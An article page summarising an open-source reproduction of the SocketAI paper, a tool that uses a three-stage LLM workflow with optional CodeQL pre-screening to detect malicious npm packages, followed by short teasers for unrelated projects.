Reading

SocketAI Reproduction: Detecting Malicious npm Packages Using LLM

Open-source reproduction of the ICSE 2025 paper SocketAI, implementing an npm package malicious code detection tool based on a three-stage LLM analysis workflow, supporting CodeQL pre-screening and full experimental data export.

npmsecurityLLMmalware detectionCodeQLstatic analysissupply chain security

Published 2026-04-08 16:14Recent activity 2026-04-08 16:21Estimated read 6 min

SocketAI Reproduction: Detecting Malicious npm Packages Using LLM

Section 01

SocketAI Reproduction: Guide to the LLM-Powered Malicious npm Package Detection Tool

This article introduces the open-source reproduction project of the ICSE 2025 paper SocketAI. This tool implements malicious code detection for npm packages based on a three-stage LLM analysis workflow, supporting CodeQL pre-screening and full experimental data export. It aims to address the problem that traditional static analysis in the npm ecosystem struggles to handle new types of malicious attacks.

Section 02

Research Background and Motivation

As the world's largest software package repository (with over 2 million packages), npm brings convenience but also carries risks of malicious code injection (e.g., install scripts executing malicious commands, dependency tampering, obfuscation and hiding, etc.). Traditional detection methods (signature-based requiring frequent rule updates, behavior-based with high false positive rates) have limitations. The semantic understanding capability of LLM can make up for the shortcomings of traditional tools, distinguishing between code with similar syntax but different intentions (e.g., cleaning temporary files vs deleting system files).

Section 03

SocketAI's Core Methodology

SocketAI adopts a three-stage progressive analysis strategy: 1. Initial Malicious Assessment: LLM quickly screens files to evaluate the potential malicious level (considering obfuscation, network requests, sensitive paths, etc.); 2. Self-Review and Correction: The model reflects on initial judgments to reduce misjudgments caused by insufficient context or superficial similarity; 3. Final File-Level Determination: Integrates information to provide a clear malicious score and reasoning process for manual review.

Section 04

Highlights of Engineering Implementation

The reproduced version balances academic rigor and engineering practicality: 1. Optional CodeQL Pre-screening: Uses CodeQL to quickly identify risk patterns, reducing the amount of LLM analysis; 2. Observability: Exports data from each analysis step (prompt, response, token consumption, time cost, etc.); 3. Flexible Input: Supports local directories and tgz/tar/zip archives; 4. Batch Processing: Performs batch detection via JSONL/CSV lists, with errors in individual samples not interrupting the batch.

Section 05

Usage and Output Structure

Usage Workflow (based on Python + uv dependency management): Examples of commands for basic detection (without CodeQL) and enabling CodeQL pre-screening. Key parameters include input (input path), model (LLM model), use-codeql/no-codeql, threshold (determination threshold), and temperature (creativity level). The output structure is clear, including runtime metadata, package-level summary, file list, performance metrics, detailed results of each stage, and exported data (CSV format).

Section 06

Practical Significance and Outlook

For Security Teams: Complements existing detection systems (traditional rules capture known threats + LLM discovers new attacks); For Researchers: Full data export facilitates verifying new ideas (replacing models, adjusting strategies, etc.). This tool provides a practical research platform for npm security detection and is an example of transforming academic achievements into engineering practice.

Section 07

Conclusion

Software supply chain attacks are becoming increasingly frequent, making npm package security detection crucial. The SocketAI reproduction version demonstrates the application potential of LLM in the security field. Although not a panacea, it provides capabilities that traditional methods are hard to achieve in semantic understanding scenarios. The open-source reproduction not only verifies the original paper's method but also provides the community with a runnable and improvable baseline implementation.

Continue Reading

Keep going with more reads from the same topic.

Nornir MCP Server: An Enterprise-Grade Bridge for Integrating Large Language Models into Network Automation

Nornir MCP Server is an enterprise-level server based on the Model Context Protocol (MCP). It seamlessly integrates large language models (such as Claude) with the Nornir network automation framework, supporting natural language orchestration for multi-vendor network devices (Cisco, Arista, Juniper, etc.), and providing production-grade features like a dual-engine architecture (NAPALM + Netmiko), intelligent filtering, and a secure sandbox.

Recent activity 2026-05-06 20:51

Bibliothèque Française LLM: A French Public Domain Literature Index System Optimized for Large Language Models

Bibliothèque Française LLM is a structured indexing and annotation project for French public domain literature designed specifically for large language models (LLMs). It integrates multiple authoritative sources such as DraCor, Common Corpus, and Wikisource, providing metadata indexing categorized by genre, author, and era, as well as in-depth annotations for dramatic texts (including characters, lines, stage directions, etc.). Its aim is to enable LLMs to efficiently read and understand classic French literary works.

Recent activity 2026-05-06 20:50

Splinter: A Lock-Free Zero-Copy Shared Memory KV and Vector Storage Library That Eliminates Socket and Memcpy Overhead for LLM Inference

Splinter is a minimalist, high-performance key-value (KV) and vector storage system enabling zero-latency inter-process communication via shared memory and atomic operations. With only 766 lines of core code, it supports millions of operations per second and 768-dimensional vector storage, offering a new architectural approach for local LLM inference and data-intensive applications.

Recent activity 2026-04-03 08:49

Folkering OS: When the Operating System Itself Is AI—A Self-Evolving Bare-Metal Rust System

Folkering OS is the world's first AI-native bare-metal operating system, entirely written in Rust no_std without relying on Linux, POSIX, or libc. It can generate commands from scratch, compile them into WASM, and run them in 10 seconds, achieving true self-evolution.

Recent activity 2026-04-09 16:15